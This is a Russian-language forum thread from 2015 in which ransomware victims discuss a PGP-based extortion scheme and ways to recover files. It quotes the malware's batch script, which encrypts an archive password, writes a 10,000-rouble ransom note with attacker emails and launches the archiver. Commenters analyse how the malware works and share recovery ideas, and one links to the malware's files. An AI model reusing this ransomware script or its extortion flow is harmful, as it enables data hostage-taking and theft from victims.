Помогите с расшифровкой PGP


Столкнулся с вирусом.
Он зашифровал с помощью PGP файлы.
Остались файлы pubring.pgp; randseed.bin ;
password.asc:



pa.bat:

if exist morjik goto endd
echo morjik>morjik


rem start winsor.exe
soundpass.exe
pgp.exe -ea password.txt asik
chcp 1251
for /F ~%%a in ('Date /t') Do ( for /f %%b in ('Time /t') do echo %%a - %%b>>password.asc)
echo Файлы запакованы в архивы с паролем.>>password.asc
echo Стоимость разархивации 10.000 рублей.>>password.asc
echo Для распаковки файлов пришлите два файла на e-mail: cricketgump@gmail.com >>password.asc
echo - файл который Вы сейчас читаете;>>password.asc
echo - один заархивированный файл небольшого размера;>>password.asc
echo В ответ на Ваше письмо придет оригинальный файл и инструкция по оплате.>>password.asc
echo (Оригинальный файл является подтверждением того, что возможно вернуть все данные в исходное состояние)>>password.asc
echo После оплаты придет пароль на архивы и программа, которая распакует все файлы.>>password.asc
echo Ответ на Ваше письмо придет в течение 24 часов.>>password.asc
echo Если ответ не приходит более 24 часов пришлите два файла на резервную почту: cricketgump@mail2tor.com>>password.asc
moar.exe
goto endd2
:endd
rem start winsor.exe

:endd2

Можно ли как нибудь расшифровать пароль на архивы?

Комментарии
— SATtva (19/01/2015 09:33)   
Пароль — маловероятно. Он зашифрован открытым ключом, закрытая часть которого находится у вымогателя. Чем он там шифровал непосредственно Ваши файлы с помощью этого пароля — вопрос; если какой-нибудь самописной софтиной, то, возможно, в ней есть какая-нибудь уязвимость.
— Михаил (19/01/2015 11:51)   
папка с его программой... и с остальными файлами[link1]
вот что смог
Гость (19/01/2015 14:07)   
какой пароль на архив по ссылке?
— Мишель (19/01/2015 15:31)   
Столкнулись с этими же ребятами, тёти из бухгалтерии не глядя запустили вирусню из почты и заархивировали файлы на сетевом диске. Мы разобрались в алгоритме PGP и поняли, что расшифровать не получится. Вытрясли из бухгалтерии 10000 и заплатили, т.к. инфа зашифрована критичная. Чуваки прислали в ответ пароль. Кстати, длина пароля – 64 символа, так что про подбор забудьте. Всё что вы имеете – это сам пароль от архивов в зашифрованном виде (PGP message), который расшифровать могут только злоумышленники, имеющие закрытый ключ. Пароль в процессе заражения генерируется случайным образом, записывается в файл password.txt, потом считывается кодироващиком (moar.exe), который в свою очередь затирает файл с паролем и проходит по всем дискам (в т.ч. сетевым), архивируя файлы. Кстати, у нас вирусня была запущена на двух компах, соответственно получилось два разных пароля. Чуваки прислали нам оба за указанную сумму. И еще: файлы вируса лежат в скрытой папке "C:\wintemp_".
— ressa (19/01/2015 15:49)   
Всегда ржал над этими, как ты правильно сказал, тетками из бухгалтерии. И на УСН и на ОСНО – вполне себе справляется облачный Б-Контур – в остальном же им вообще винда не нужна. Изначально подбирать банк, с клиентом под Linux, к примеру ПСБ и все. 10 000р – легко отделались, малой кровью так сказать. Попросили бы миллион и сидели бы потом все без премий с урезанными окладами, пока этот миллион бы не отбился ибо "шифровальщик был с GPG". Я тебе не про твой лично случай а про бухгалтерию в целом. А то там начинается право выбора "Мне винда привычнее", "А мне 1С удобнее" и тд. Ну или браузеры бы принудительно из под SanBoxIE запускали бы им, хотя в случае винды точно не спасет.
Гость (21/01/2015 03:44)   
Пароль 123 на архив сорри что забыл сказать
Гость (21/01/2015 03:46)   
Нельзя ли открыть файл Moar.exe и узнать что да как?
— Мишель (22/01/2015 10:34)   
Открыли. Moar.exe читает сгенерированный пароль из файла, удаляет файл с паролем и архивирует пользовательские файлы. Пока процесс архивации идет – пароль можно перехватить с помощью Process Monitor: moar.exe запускает rar.exe для каждого файла с открытым паролем в параметрах запуска. Как только moar.exe закончил свою работу – всё, пароль забыт. Остается только в PGP-зашифрованном виде.
Гость (22/01/2015 15:11)   
Т.е. если я запущу его еще раз, отслежу пароль, то пароль будет другим на предыдущие задания?
Создались множество архивов....
Гость (22/01/2015 18:45)   
Пароль действительно имеет длину 64 символа. Но пароль, который удалось получить через процесс эксплорер состоит из цифр и пароль имеет вид такой 4639847246398472463984724639847246398472463984724639847246398472
тупо повторение 8 раз блока в восьми цифр. Осталось найти подборщик.
— sentaus (22/01/2015 23:14)   
А файловую систему поковырять не пробовали каким-нибудь testdisk-ом?

Пароль в момент запуска pgp.exe, похоже, лежит на диске в файле password.txt открытым текстом. Если он не затирается, а просто удаляется, то вытащить не должно быть большой проблемой.
— Михаил (29/01/2015 06:47)   
Попробую конечно...но мы уже искали другими программами по восстановлению удаленных файлов,безуспешно.не нашлось ни одного password.txt
— Денис (28/02/2015 22:29)   
МИшель, а это нескромно будет попросить у вас его программу для дешифровки?
Гость (01/03/2015 02:03)   
Помогите с расшифровкой PGP

Столкнулся с вирусом.
Он зашифровал с помощью PGP файлы.

— Мишель (19/01/2015 15:31) <#>
Столкнулись с этими же ребятами, тёти из бухгалтерии не глядя запустили вирусню из почты и заархивировали файлы на сетевом диске. Мы разобрались в алгоритме PGP и поняли, что расшифровать не получится. Вытрясли из бухгалтерии 10000 и заплатили, т.к. инфа зашифрована критичная. Чуваки прислали в ответ пароль.

Эти пароли могут быть одинаковыми?

Ссылки
[link1] http://dropmefiles.com/0c727